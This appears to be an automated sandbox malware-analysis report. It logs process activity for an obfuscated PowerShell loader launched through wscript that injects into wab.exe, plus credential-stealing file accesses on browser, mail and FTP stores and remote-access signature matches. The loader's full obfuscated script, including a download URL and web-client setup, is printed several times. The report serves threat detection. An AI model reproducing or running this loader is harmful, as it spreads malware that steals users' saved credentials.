M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'unscrambles islndingers198 fetichdyrkernes stadioners impossible236 manhunts counterpropagations regnestokkene arbejdsdelings reactualizations maurernes fodrodsknoglerne fjerntboendes247 periangiocholitis103 cykelkdernes alisphenoid hispidity velplejede noggings mntvaskeriernes uskadeliggjort isoptic aminoketone housemaidenly unscrambles islndingers198 fetichdyrkernes stadioners impossible236 manhunts counterpropagations regnestokkene arbejdsdelings reactualizations maurernes fodrodsknoglerne fjerntboendes247 periangiocholitis103 cykelkdernes alisphenoid hispidity velplejede noggings mntvaskeriernes uskadeliggjort isoptic aminoketone housemaidenly';if (${host}.currentculture) {$cyperaceous++;}function lecithalbumin($transfusionskanylerne){$tysklandsrejse=$transfusionskanylerne.length-$cyperaceous;$undersupplied='substri';$undersupplied+='ng';for( $elisioner=2;$elisioner -lt $tysklandsrejse;$elisioner+=3){$unscrambles+=$transfusionskanylerne.$undersupplied.invoke( $elisioner, $cyperaceous);}$unscrambles;}function rysters($baksningers){ & ($datolinjerne) ($baksningers);}$eftersprgslens107=lecithalbumin 'vkmnoo oz mi.nl nl ea.i/ .5fj.g.0 m e.(phw ,i sn.edfao swums f ,n,at s su1,u0h .cy0in;ov a,w oit,nl,6tr4va;o. osxga6do4d ;cl cor evse: s1,i2ne1re. e0pl)pe .dge estcbak ho ,/ v2sa0dy1th0 .0me1om0 .1fo rofari rbeepifvaoadxk,/af1re2 i1.c.ad0se ';$mottolike90=lecithalbumin 'geul.sphesurlu- .a .g bes.naptru ';$impossible236=lecithalbumin ',ahcat nthepp.s u:ug/ c/ sdenrplismv,eein.,ag aodaodjg ,lthe a.f cenodimuf/syudacho?,oe ixunpepokarn.tfo=u dxxo mwunnsyljooepag,dth&bui ,d h=in1,cysuz ebaoa rzilrewp dcow .kate s1gu5 espn,o4t vgl7cat u0pay.ymalp.l9bl6 dmcrbtr-arkbrlkruruq u ';$oversocially=lecithalbumin 're>br ';$datolinjerne=lecithalbumin ' gi bea,x f ';$biles='regnestokkene';$ekstemporeringernes = lecithalbumin 'mielocbrhelo,f do%pea,up apm d .a,ptsoait%,u\porpiub,n.ad,kts,e .ncoo.fmsemhye r e.atr uh dy s k& .&mi rerecglhbrope t tho ';rysters (lecithalbumin '.r$e.g alblo mbtia alu.: bduni ,a dcvao .dsyisiob nva1sm2k.5 u=st(yect.mhedpo p/.ycte te$,ae sk.oskotaneurm ip,nop r,eesjrreid,n agprepsr tns.ed.sr.)po ');rysters (lecithalbumin 'fo$ingg,lstot.bs.aexl.l:alsnotsoag d .ibro rncee lr smo=,e$bri im.epunonosafsbriheb pl.oeda2ud3 ,6ga.scs rp dl,hiret t(l.$beo pvc,e srresviohjc pifeae.lkll cyu.) g ');rysters (lecithalbumin 'm.[ env,esctka.jus besmrpivesipoc ge tp mo dimanrltcommiakonhea .g.nethrsu]or:in:.esfuealc u arsti st,eylaprur no ntc oalcmio.ols ,r=ke ly[prn se ,t ,.sps .e .cdeu,tr niset dyropbir oobitteococlso ulkatt.y op e.l],o:fo:sytskls,sb 1tj2h ');$impossible236=$stadioners[0];$cottonopolis= (lecithalbumin 'in$lig.dll.o lborajal l:pru,nt ,y,opkoi s.rkp,etisp.=fln.gefiw ,-ouod bn j,nedicw.t a m,s rydrsret,eep.m ..linynerats,.l,w,aerobfocf lrei ,eslnc,t');$cottonopolis+=$diacodion125[1];rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unscrambles islndingers198 fetichdyrkernes stadioners impossible236 manhunts counterpropagations regnestokkene arbejdsdelings reactualizations maurernes fodrodsknoglerne fjerntboendes247 periangiocholitis103 cykelkdernes alisphenoid hispidity velplejede noggings mntvaskeriernes uskadeliggjort isoptic aminoketone housemaidenly unscrambles islndingers198 fetichdyrkernes stadioners impossible236 manhunts counterpropagations regnestokkene arbejdsdelings reactualizations maurernes fodrodsknoglerne fjerntboendes247 periangiocholitis103 cykelkdernes alisphenoid hispidity velplejede noggings mntvaskeriernes uskadeliggjort isoptic aminoketone housemaidenly';if (${host}.currentculture) {$cyperaceous++;}function lecithalbumin($transfusionskanylerne){$tysklandsrejse=$transfusionskanylerne.length-$cyperaceous;$undersupplied='substri';$undersupplied+='ng';for( $elisioner=2;$elisioner -lt $tysklandsrejse;$elisioner+=3){$unscrambles+=$transfusionskanylerne.$undersupplied.invoke( $elisioner, $cyperaceous);}$unscrambles;}function rysters($baksningers){ & ($datolinjerne) ($baksningers);}$eftersprgslens107=lecithalbumin 'vkmnoo oz mi.nl nl ea.i/ .5fj.g.0 m e.(phw ,i sn.edfao swums f ,n,at s su1,u0h .cy0in;ov a,w oit,nl,6tr4va;o. osxga6do4d ;cl cor evse: s1,i2ne1re. e0pl)pe .dge estcbak ho ,/ v2sa0dy1th0 .0me1om0 .1fo rofari rbeepifvaoadxk,/af1re2 i1.c.ad0se ';$mottolike90=lecithalbumin 'geul.sphesurlu- .a .g bes.naptru ';$impossible236=lecithalbumin ',ahcat nthepp.s u:ug/ c/ sdenrplismv,eein.,ag aodaodjg ,lthe a.f cenodimuf/syudacho?,oe ixunpepokarn.tfo=u dxxo mwunnsyljooepag,dth&bui ,d h=in1,cysuz ebaoa rzilrewp dcow .kate s1gu5 espn,o4t vgl7cat u0pay.ymalp.l9bl6 dmcrbtr-arkbrlkruruq u ';$oversocially=lecithalbumin 're>br ';$datolinjerne=lecithalbumin ' gi bea,x f ';$biles='regnestokkene';$ekstemporeringernes = lecithalbumin 'mielocbrhelo,f do%pea,up apm d .a,ptsoait%,u\porpiub,n.ad,kts,e .ncoo.fmsemhye r e.atr uh dy s k& .&mi rerecglhbrope t tho ';rysters (lecithalbumin '.r$e.g alblo mbtia alu.: bduni ,a dcvao .dsyisiob nva1sm2k.5 u=st(yect.mhedpo p/.ycte te$,ae sk.oskotaneurm ip,nop r,eesjrreid,n agprepsr tns.ed.sr.)po ');rysters (lecithalbumin 'fo$ingg,lstot.bs.aexl.l:alsnotsoag d .ibro rncee lr smo=,e$bri im.epunonosafsbriheb pl.oeda2ud3 ,6ga.scs rp dl,hiret t(l.$beo pvc,e srresviohjc pifeae.lkll cyu.) g ');rysters (lecithalbumin 'm.[ env,esctka.jus besmrpivesipoc ge tp mo dimanrltcommiakonhea .g.nethrsu]or:in:.esfuealc u arsti st,eylaprur no ntc oalcmio.ols ,r=ke ly[prn se ,t ,.sps .e .cdeu,tr niset dyropbir oobitteococlso ulkatt.y op e.l],o:fo:sytskls,sb 1tj2h ');$impossible236=$stadioners[0];$cottonopolis= (lecithalbumin 'in$lig.dll.o lborajal l:pru,nt ,y,opkoi s.rkp,etisp.=fln.gefiw ,-ouod bn j,nedicw.t a m,s rydrsret,eep.m ..linynerats,.l,w,aerobfocf lrei ,eslnc,t');$cottonopolis+=$diacodion125[1];rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unscrambles islndingers198 fetichdyrkernes stadioners impossible236 manhunts counterpropagations regnestokkene arbejdsdelings reactualizations maurernes fodrodsknoglerne fjerntboendes247 periangiocholitis103 cykelkdernes alisphenoid hispidity velplejede noggings mntvaskeriernes uskadeliggjort isoptic aminoketone housemaidenly unscrambles islndingers198 fetichdyrkernes stadioners impossible236 manhunts counterpropagations regnestokkene arbejdsdelings reactualizations maurernes fodrodsknoglerne fjerntboendes247 periangiocholitis103 cykelkdernes alisphenoid hispidity velplejede noggings mntvaskeriernes uskadeliggjort isoptic aminoketone housemaidenly';if (${host}.currentculture) {$cyperaceous++;}function lecithalbumin($transfusionskanylerne){$tysklandsrejse=$transfusionskanylerne.length-$cyperaceous;$undersupplied='substri';$undersupplied+='ng';for( $elisioner=2;$elisioner -lt $tysklandsrejse;$elisioner+=3){$unscrambles+=$transfusionskanylerne.$undersupplied.invoke( $elisioner, $cyperaceous);}$unscrambles;}function rysters($baksningers){ & ($datolinjerne) ($baksningers);}$eftersprgslens107=lecithalbumin 'vkmnoo oz mi.nl nl ea.i/ .5fj.g.0 m e.(phw ,i sn.edfao swums f ,n,at s su1,u0h .cy0in;ov a,w oit,nl,6tr4va;o. osxga6do4d ;cl cor evse: s1,i2ne1re. e0pl)pe .dge estcbak ho ,/ v2sa0dy1th0 .0me1om0 .1fo rofari rbeepifvaoadxk,/af1re2 i1.c.ad0se ';$mottolike90=lecithalbumin 'geul.sphesurlu- .a .g bes.naptru ';$impossible236=lecithalbumin ',ahcat nthepp.s u:ug/ c/ sdenrplismv,eein.,ag aodaodjg ,lthe a.f cenodimuf/syudacho?,oe ixunpepokarn.tfo=u dxxo mwunnsyljooepag,dth&bui ,d h=in1,cysuz ebaoa rzilrewp dcow .kate s1gu5 espn,o4t vgl7cat u0pay.ymalp.l9bl6 dmcrbtr-arkbrlkruruq u ';$oversocially=lecithalbumin 're>br ';$datolinjerne=lecithalbumin ' gi bea,x f ';$biles='regnestokkene';$ekstemporeringernes = lecithalbumin 'mielocbrhelo,f do%pea,up apm d .a,ptsoait%,u\porpiub,n.ad,kts,e .ncoo.fmsemhye r e.atr uh dy s k& .&mi rerecglhbrope t tho ';rysters (lecithalbumin '.r$e.g alblo mbtia alu.: bduni ,a dcvao .dsyisiob nva1sm2k.5 u=st(yect.mhedpo p/.ycte te$,ae sk.oskotaneurm ip,nop r,eesjrreid,n agprepsr tns.ed.sr.)po ');rysters (lecithalbumin 'fo$ingg,lstot.bs.aexl.l:alsnotsoag d .ibro rncee lr smo=,e$bri im.epunonosafsbriheb pl.oeda2ud3 ,6ga.scs rp dl,hiret t(l.$beo pvc,e srresviohjc pifeae.lkll cyu.) g ');rysters (lecithalbumin 'm.[ env,esctka.jus besmrpivesipoc ge tp mo dimanrltcommiakonhea .g.nethrsu]or:in:.esfuealc u arsti st,eylaprur no ntc oalcmio.ols ,r=ke ly[prn se ,t ,.sps .e .cdeu,tr niset dyropbir oobitteococlso ulkatt.y op e.l],o:fo:sytskls,sb 1tj2h ');$impossible236=$stadioners[0];$cottonopolis= (lecithalbumin 'in$lig.dll.o lborajal l:pru,nt ,y,opkoi s.rkp,etisp.=fln.gefiw ,-ouod bn j,nedicw.t a m,s rydrsret,eep.m ..linynerats,.l,w,aerobfocf lrei ,eslnc,t');$cottonopolis+=$diacodion125[1];rysters Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000015.00000002.2589661383.00000000228A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2589661383.00000000228D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8092, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: Yara match File source: 00000015.00000002.2589661383.00000000228A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8092, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000015.00000002.2589661383.00000000228A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2589661383.00000000228D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 8092, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs